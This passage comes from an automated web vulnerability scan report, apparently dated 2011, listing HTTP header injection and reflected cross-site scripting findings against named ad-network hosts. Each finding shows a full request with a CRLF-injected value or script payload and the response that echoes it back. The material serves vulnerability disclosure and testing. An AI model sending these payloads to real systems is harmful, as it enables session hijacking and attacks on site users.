Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 14:56:08 GMT
Expires: Wed, 11 May 2011 14:56:08 GMT
DCLK_imp: v7;x;44306;0-0;0;57450681;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;secure=16dd0
6df1ea6af7c
;~cs=x:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/w;44306;0-0;0;57450681;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

4.34. http://amch.questionmarket.com/adsc/d872313/2/873601/adscout.php [ES cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d872313/2/873601/adscout.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload d33d1%0d%0a58657f7c565 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d872313/2/873601/adscout.php?ord=1305125772 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1; ES=d33d1%0d%0a58657f7c565

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 14:59:57 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Tue, 11-May-2010 14:59:56 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; expires=Sun, 01-Jul-2012 06:59:57 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=d33d1
58657f7c565
_872313-Lc{(M-0; expires=Sun, 01-Jul-2012 06:59:57 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

4.35. http://bidder.mathtag.com/iframe/notify [exch parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload c657c%0d%0a5d8d4c8cc62 was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /iframe/notify?exch=c657c%0d%0a5d8d4c8cc62&id=5aW95q2jLzEvTWpsRk5ETkVPRVl0TlRKRE5TMDBRemRDTFVJeVJVRXRNREU0TVRRNU5rVTJOamN4L05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MDI3ODU5NzE0Nzc4MTQ4OS8xMTUwMDEvMTAwNDcwLzMvUTNBbV9DbnBmUVVnTncyOVZSNGhUbGlXalYwQm8xb2xMWDVWYTJtWVgxby8/YJjpCmEQlxiFoHxAulO7EVkILUo&price=2.6220 HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=6344371306205&tile=6344371306205&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1305034155; ts=1305035634

Response

HTTP/1.1 404 Not found
Date: Wed, 11 May 2011 15:33:57 GMT
Server: MMBD/3.5.5
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - c657c
5d8d4c8cc62

x-mm-host: ewr-bidder-x4
Connection: keep-alive

Request not found

4.36. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 46abe%0d%0a9b358d367e6 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5309511~~0~~~^ebAdDuration~898~0~01020&OptOut=0&ebRandom=0.08333570836111903&flv=46abe%0d%0a9b358d367e6&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/sugar.tres/gallery;nid=16415520;sz=728x90;gid=3019466;pos=above;dcopt=ist;tile=1;ord=49966
Origin: http://ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=0feef563-39b8-4300-9699-4c81bf2e4f803I1070; expires=Tue, 09-Aug-2011 11:59:36 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=46abe
9b358d367e6
&RES=128&WMPV=0; expires=Tue, 09-Aug-2011 11:59:36 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 11 May 2011 15:59:35 GMT
Connection: close
Content-Length: 0


4.37. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 2f374%0d%0aa48f472db94 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5309511~~0~~~^ebAdDuration~898~0~01020&OptOut=0&ebRandom=0.08333570836111903&flv=10.2154&wmpv=0&res=2f374%0d%0aa48f472db94 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/sugar.tres/gallery;nid=16415520;sz=728x90;gid=3019466;pos=above;dcopt=ist;tile=1;ord=49966
Origin: http://ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=a3591fcb-49e0-4f71-9780-53d46227fc2d3I1010; expires=Tue, 09-Aug-2011 11:59:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=2f374
a48f472db94
&WMPV=0; expires=Tue, 09-Aug-2011 11: 59:37 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 11 May 2011 15:59:37 GMT
Connection: close
Content-Length: 0


4.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 41619%0d%0abd382df1bca was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5309511~~0~~~^ebAdDuration~898~0~01020&OptOut=0&ebRandom=0.08333570836111903&flv=10.2154&wmpv=41619%0d%0abd382df1bca&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/sugar.tres/gallery;nid=16415520;sz=728x90;gid=3019466;pos=above;dcopt=ist;tile=1;ord=49966
Origin: http://ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=36ccc5a7-0f3e-433c-9271-dc28e58e2b203I1070; expires=Tue, 09-Aug-2011 11:59:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=128&WMPV=41619
bd382df1bca
; expires=Tue, 09-Aug-2011 11: 59:37 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 11 May 2011 15:59:36 GMT
Connection: close
Content-Length: 0


4.39. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-406/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload d2e76%0d%0a247d47d2a9 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-406/c5/jsc/fm.js?c=5344/1032/1&a=0&f=&n=305&r=13&d=15&q=&$=d2e76%0d%0a247d47d2a9&s=510&z=0.3061985722742975 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://blog.zap2it.com/pop2it/2011/05/cannes-film-festival-uma-thurman-jude-law-salma-hayek-and-more-kick-things-off.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; __qca=P0-591305981-1304358415303; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968:305,4479#945899|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1:0,18,1; PI=h478907Za945899Zc305004479,305004479Zs1128Zt1130; FFCap=1581B1219,212244:1452,206974:1432,193317,193139,206002|0,1,1:0,9,1:2,10,1:1,10,1:0,10,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:d2e76
247d47d2a9
;expires=Thu, 12 May 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,5344,15;expires=Thu, 12 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 12 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968:305,4479#945899,5344#940496|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1:0,18,1:0,19,1;expires=Fri, 10 Jun 2011 14:55:57 GMT;path=/;domain=.zedo.com;
ETag: "867f4fde-838c-4a1e244fdb0c0"
Vary: Accept-Encoding
X-Varnish: 545954245 545953947
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=386
Expires: Wed, 11 May 2011 15:02:23 GMT
Date: Wed, 11 May 2011 14:55:57 GMT
Connection: close
Content-Length: 7308

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=510;var zzPat=',d2e76

...[SNIP]...

4.40. http://c7.zedo.com/utils/ecSet.js [v parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload 4e804%0d%0af22f49a1fc0 was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=4e804%0d%0af22f49a1fc0&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://blog.zap2it.com/pop2it/2011/05/cannes-film-festival-uma-thurman-jude-law-salma-hayek-and-more-kick-things-off.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; __qca=P0-591305981-1304358415303; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; PI=h478907Za945899Zc305004479,305004479Zs1128Zt1130; FFCap=1581B1219,212244:1452,206974:1432,193317,193139,206002|0,1,1:0,9,1:2,10,1:1,10,1:0,10,1; ZCBC=1; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968:305,4479#945899,5344#945899|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1:0,18,1:0,19,1; FFcat=305,5344,15; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 4e804
f22f49a1fc0
;expires=Fri, 10 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=776
Date: Wed, 11 May 2011 14:55:49 GMT
Connection: close


4.41. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/22NAU6HRG5G2PGRKDKJIVI [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/22NAU6HRG5G2PGRKDKJIVI

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 4b79b%0d%0aaa9a10bcb35 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /c/4b79b%0d%0aaa9a10bcb35/SDUW4IOBWFCKJBD7TJN7TI/22NAU6HRG5G2PGRKDKJIVI?pv=42511511826.887726&cookie=&width=300&height=250&x=0&y=0&keyw=&site_url=http://4770.anonymous.google&cpm=g)))TcqlvgANzLoK2jCMzFsui6yzraqQqyOfHG37VA HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=9de52dcbec4c3cf1dab71495bd2ad935

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Wed, 11 May 2011 16:03:13 GMT
Connection: keep-alive
Set-Cookie: __adroll=9de52dcbec4c3cf1dab71495bd2ad935; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/r/4b79b
aa9a10bcb35
/SDUW4IOBWFCKJBD7TJN7TI/06a42aef022da2d7607cb836f41051af.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


4.42. http://www22.glam.com/cTagsImgCmd.act [gname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.glam.com
Path:   /cTagsImgCmd.act

Issue detail

The value of the gname request parameter is copied into the Set-Cookie response header. The payload 308eb%0d%0a869869b8828 was submitted in the gname parameter. This caused a response containing an injected HTTP header.

Request

GET /cTagsImgCmd.act?gtid=5000000440&gcmd=setc&gexpires=172800&gname=308eb%0d%0a869869b8828&gvalue=D,T,1644,5606,3726,2951,2705,2695,2694,2690,1771 HTTP/1.1
Host: www22.glam.com
Proxy-Connection: keep-alive
Referer: http://www.shefinds.com/2011/cannes-film-festival-begins-today-time-to-reflect-on-last-years-best-dressed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1304359345.1304361407.4; ctags=%3bct%3dbarhp; bkpix2=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://www35t.glam.com/jsadimp.gif?1^0^624c8ac7fbb041fd06d542d012ed1a61^116391130334874196611^1^446224^/^1x1^5000000440^31230390^-1^-1^-1^-1^0^0^293513051263372695^p^^0^^US^511^0^0^0^WASHINGTON^0^0^0^0^^308eb
Set-Cookie: 308eb
869869b8828
=D,T,1644,5606,3726,2951,2705,2695,2694,2690,1771; expires=Fri, 13 May 2011 15: 05:37 GMT; path=/; domain=.glam.com;
ETag: "662c9bddfc82c61ba8066514fc2b172e:1276888104"
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Cache-Control: max-age=132
Date: Wed, 11 May 2011 15:05:37 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

5. Cross-site scripting (reflected)

There are 402 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload fb331<script>alert(1)</script>4cd38e9ddde was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480fb331<script>alert(1)</script>4cd38e9ddde&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547; SERVERID=s13

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:14:23 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480fb331<script>alert(1)</script>4cd38e9ddde-SM=adver_05-11-2011-15-14-23; expires=Sat, 14-May-2011 15:14:23 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480fb331<script>alert(1)</script>4cd38e9ddde-VT=adver_05-11-2011-15-14-23_8788446831305126863; expires=Mon, 09-May-2016 15:14:23 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480fb331<script>alert(1)</script>4cd38e9ddde-nUID=adver_8788446831305126863; expires=Wed, 11-May-2011 15:29:23 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480fb331<script>alert(1)</script>4cd38e9ddde';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='8788446831305126863';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='
...[SNIP]...

5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 48f1c<script>alert(1)</script>23687cc4e4f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver48f1c<script>alert(1)</script>23687cc4e4f&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547; SERVERID=s13

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:14:14 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sat, 14-May-2011 15:14:14 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547ZZZZadver48f1c%3Cscript%3Ealert%281%29%3C%2Fscript%3E23687cc4e4f_05-11-2011-15-14-14_9050736521305126854; expires=Mon, 09-May-2016 15:14:14 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver48f1c%3Cscript%3Ealert%281%29%3C%2Fscript%3E23687cc4e4f_9050736521305126854; expires=Wed, 11-May-2011 15:29:14 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
